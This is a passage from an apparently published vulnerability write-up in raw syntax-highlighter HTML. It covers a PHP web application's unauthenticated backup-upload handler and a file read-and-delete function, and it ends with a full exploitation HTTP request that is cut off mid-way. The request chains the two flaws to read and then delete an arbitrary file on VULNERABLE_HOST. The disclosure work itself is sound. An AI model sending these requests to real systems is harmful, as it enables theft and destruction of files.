class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">filesize<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc0266046815-9\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">readfile<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc0266046815-10\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">unlink<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">path<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc0266046815-11\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">unlink<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc0266046815-12\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0014 seconds] -->  <\/p>\n<p>So this couldn&#8217;t be directly exploited because it actually views the contents of the path, that&#8217;s written in a file (idk what could be the purpose of this function), but I found another minor file upload vulnerability (no .php extensions) that helps exploiting this. In \/get\/settings-set-backup.php,<\/p>\n<p>Vulnerable code:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5ae0fedea1cc3597269406\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> } else if ($_POST[&#8216;action&#8217;] == &#8216;upload&#8217; ) {    $viperpath = &#8216;\/control\/command\/backup\/upload\/&#8217;;    $send = &#8220;false&#8221;;    $vipperResult = &#8220;0&#8221;;      \/\/ kontrola existence nahravaneho souboru    if(empty($_FILES[&#8216;restore_file&#8217;][&#8216;tmp_name&#8217;]))      die(&#8216;{&#8220;success&#8221;:&#8221;false&#8221;,            &#8220;vipperResult&#8221;:&#8221;-3&#8243;,            &#8220;resultDesc&#8221;:&#8221;ER_FILE_NOT_FOUND&#8221;           }&#8217;);          \/\/ cesta k nahranemu souboru    $tmpName = realpath(dirname(__FILE__) . &#8216;\/..\/..\/tmp\/&#8217;).&#8217;\\restore_bkp_&#8217;.$_SESSION[&#8216;useruid&#8217;];        copy($_FILES[&#8216;restore_file&#8217;][&#8216;tmp_name&#8217;], $tmpName);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc3597269406-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc3597269406-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc3597269406-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc3597269406-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc3597269406-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc3597269406-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc3597269406-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc3597269406-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc3597269406-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc3597269406-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc3597269406-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc3597269406-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc3597269406-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc3597269406-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc3597269406-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc3597269406-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc3597269406-17\">17<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc3597269406-1\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_POST<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;action&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;upload&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc3597269406-2\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">viperpath<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;\/control\/command\/backup\/upload\/&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc3597269406-3\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">send<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;false&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc3597269406-4\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">vipperResult<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc3597269406-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc3597269406-6\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ kontrola existence nahravaneho souboru<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc3597269406-7\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">empty<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_FILES<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;restore_file&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;tmp_name&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc3597269406-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">die<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;{&#8220;success&#8221;:&#8221;false&#8221;,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc3597269406-9\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#8220;vipperResult&#8221;:&#8221;-3&#8243;,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc3597269406-10\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#8220;resultDesc&#8221;:&#8221;ER_FILE_NOT_FOUND&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc3597269406-11\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc3597269406-12\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc3597269406-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc3597269406-14\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ cesta k nahranemu souboru<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc3597269406-15\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">tmpName<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">realpath<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">dirname<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">__FILE__<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;\/..\/..\/tmp\/&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-s\">&#8216;\\restore_bkp_&#8217;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_SESSION<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;useruid&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc3597269406-16\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc3597269406-17\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">copy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_FILES<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;restore_file&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;tmp_name&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">tmpName<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0016 seconds] -->  <\/p>\n<p>This requires no authentication, and will create file restore_bkp_ (as _SESSION[&#8216;useruid&#8217;] would be null) with whatever content we want (the path we want to disclose and consequently delete of course).<\/p>\n<p>Exploitation requests:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5ae0fedea1cc6903955316\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> POST \/get\/settings-set-backup.php HTTP\/1.1  Host: VULNERABLE_HOST:20394  Connection: close  Content-Length: 306  Cache-Control: max-age=0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8  Origin: https:\/\/VULNERABLE_HOST:20394  Upgrade-Insecure-Requests: 1  User-Agent: Mozilla  Content-Type: multipart\/form-data; boundary=&#8212;-WebKitFormBoundary6rzvt7fRozJ1TlNT  Referer: https:\/\/VULNERABLE_HOST:20394\/  Accept-Encoding: gzip, deflate  Accept-Language: en-US,en;q=0.8    &#8212;&#8212;WebKitFormBoundary6rzvt7fRozJ1TlNT  Content-Disposition: form-data; name=&#8221;restore_file&#8221;; filename=&#8221;exploit.txt&#8221;  Content-Type: text\/plain    C:private.txt  &#8212;&#8212;WebKitFormBoundary6rzvt7fRozJ1TlNT  Content-Disposition: form-data; name=&#8221;action&#8221;    upload  &#8212;&#8212;WebKitFormBoundary6rzvt7fRozJ1TlNT&#8211;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc6903955316-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc6903955316-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc6903955316-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc6903955316-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc6903955316-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc6903955316-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc6903955316-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc6903955316-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc6903955316-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc6903955316-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc6903955316-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc6903955316-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-24\">24<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-1\"><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">get<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">settings<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">backup<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">php <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">VULNERABLE_HOST<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">20394<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-3\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-4\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">306<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-5\"><span class=\"crayon-v\">Cache<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Control<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">max<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">age<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">image<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">webp<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-7\"><span class=\"crayon-v\">Origin<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/VULNERABLE_HOST:20394<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-8\"><span class=\"crayon-v\">Upgrade<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Insecure<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Requests<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-9\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Mozilla<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-10\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">multipart<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">boundary<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-e\">WebKitFormBoundary6rzvt7fRozJ1TlNT<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-11\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/VULNERABLE_HOST:20394\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-12\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-13\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-14\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-15\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-e\">WebKitFormBoundary6rzvt7fRozJ1TlNT<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-16\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;restore_file&#8221;<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;exploit.txt&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-17\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">plain<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-18\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-19\"><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-m\">private<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">txt<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-20\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-e\">WebKitFormBoundary6rzvt7fRozJ1TlNT<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-21\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span 